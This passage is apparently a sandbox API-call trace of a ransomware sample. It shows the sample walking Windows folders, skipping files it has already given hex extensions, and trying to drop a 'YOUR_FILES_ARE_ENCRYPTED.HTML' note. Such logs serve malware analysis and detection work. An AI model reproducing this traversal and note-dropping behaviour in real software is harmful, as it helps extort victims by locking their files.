dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user-40.png", cAlternateFileName="")) returned 1 [0110.202] StrStrIW (lpFirst="user-40.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.202] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png") returned 66 [0110.202] PathFindExtensionW (pszPath="user-40.png") returned=".png" [0110.202] lstrlenW (lpString=".png") returned 4 [0110.202] PathFindExtensionW (pszPath="user-40.png") returned=".png" [0110.202] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-40.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-40.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0110.203] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=433) returned 1 [0110.203] CloseHandle (hObject=0x308) returned 1 [0110.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972f07a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f5, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user-48.png", cAlternateFileName="")) returned 1 [0110.203] StrStrIW (lpFirst="user-48.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.203] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png") returned 66 [0110.203] PathFindExtensionW (pszPath="user-48.png") returned=".png" [0110.203] lstrlenW (lpString=".png") returned 4 [0110.203] PathFindExtensionW (pszPath="user-48.png") returned=".png" [0110.203] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user-48.png" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user-48.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0110.203] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=501) returned 1 [0110.203] CloseHandle (hObject=0x308) returned 1 [0110.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf08eccd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x93038, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76", cAlternateFileName="")) returned 1 [0110.203] StrStrIW (lpFirst="user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.203] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76") returned 128 [0110.203] PathFindExtensionW (pszPath="user.bmp.08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76") returned=".08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76" [0110.203] lstrlenW (lpString=".08510F7314C2C923A183D099E21D05C5C32824088AED51ECD59560BA76C32A76") returned 65 [0110.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360076a, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972f07a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xaf191fea, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1518, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69", cAlternateFileName="")) returned 1 [0110.203] StrStrIW (lpFirst="user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.203] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69") returned 128 [0110.203] PathFindExtensionW (pszPath="user.png.5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69") returned=".5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69" [0110.203] lstrlenW (lpString=".5704C4FB9A0A8563132C56988D69AA33F75C7E79C3B3B12EE1815AC022258C69") returned 65 [0110.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0a7411, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0a7411, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0aad88, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.203] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0a7411, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0a7411, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0aad88, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.203] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.204] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 84 [0110.204] GetProcessHeap () returned 0x600000 [0110.204] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.204] GetProcessHeap () returned 0x600000 [0110.204] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.204] GetProcessHeap () returned 0x600000 [0110.204] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.205] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Vault", cAlternateFileName="")) returned 1 [0110.205] StrStrIW (lpFirst="Vault", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.205] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned 38 [0110.205] GetProcessHeap () returned 0x600000 [0110.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.206] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault" [0110.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*" [0110.206] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf0c0d19, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.206] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf0c0d19, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.206] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="AC658CB4-9126-49BD-B877-31EEDAB3F204", cAlternateFileName="AC658C~1")) returned 1 [0110.206] StrStrIW (lpFirst="AC658CB4-9126-49BD-B877-31EEDAB3F204", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.206] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned 75 [0110.206] GetProcessHeap () returned 0x600000 [0110.206] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.207] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204" [0110.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*" [0110.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf0b8432, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x6265f8 [0110.207] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf0b8432, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0110.207] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x9e, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", cAlternateFileName="154E23~1.VSC")) returned 1 [0110.207] StrStrIW (lpFirst="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.207] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned 117 [0110.207] PathFindExtensionW (pszPath="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned=".vsch" [0110.207] lstrlenW (lpString=".vsch") returned 5 [0110.207] PathFindExtensionW (pszPath="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch") returned=".vsch" [0110.207] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", cAlternateFileName="2F1A65~1.VSC")) returned 1 [0110.207] StrStrIW (lpFirst="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.207] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned 117 [0110.207] PathFindExtensionW (pszPath="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned=".vsch" [0110.207] lstrlenW (lpString=".vsch") returned 5 [0110.207] PathFindExtensionW (pszPath="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch") returned=".vsch" [0110.207] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", cAlternateFileName="3CCD54~1.VSC")) returned 1 [0110.207] StrStrIW (lpFirst="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.207] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned 117 [0110.208] PathFindExtensionW (pszPath="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned=".vsch" [0110.208] lstrlenW (lpString=".vsch") returned 5 [0110.208] PathFindExtensionW (pszPath="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch") returned=".vsch" [0110.208] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 1 [0110.208] StrStrIW (lpFirst="Policy.vpol", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.208] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol") returned 87 [0110.208] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0110.208] lstrlenW (lpString=".vpol") returned 5 [0110.208] PathFindExtensionW (pszPath="Policy.vpol") returned=".vpol" [0110.208] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0b8432, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0b8432, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0bbf4d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.208] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0b8432, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0b8432, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0bbf4d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6306d6, dwReserved1=0x630688, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.208] FindClose (in: hFindFile=0x6265f8 | out: hFindFile=0x6265f8) returned 1 [0110.208] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.208] GetProcessHeap () returned 0x600000 [0110.208] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.208] GetProcessHeap () returned 0x600000 [0110.208] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.208] GetProcessHeap () returned 0x600000 [0110.208] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.209] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0c0d19, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0c0d19, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0c47ad, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.209] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0c0d19, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf0c0d19, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf0c47ad, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.209] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0110.209] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0110.209] GetProcessHeap () returned 0x600000 [0110.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.210] GetProcessHeap () returned 0x600000 [0110.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.210] GetProcessHeap () returned 0x600000 [0110.210] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.211] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="WDF", cAlternateFileName="")) returned 1 [0110.211] StrStrIW (lpFirst="WDF", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.211] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF") returned 36 [0110.211] GetProcessHeap () returned 0x600000 [0110.211] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.212] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF" [0110.212] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF\\*" [0110.212] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\WDF\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf0cbca0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.212] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf0cbca0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.212] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf0cbca0, ftCreationTime.dwHighDateTime=0x1d7347a, 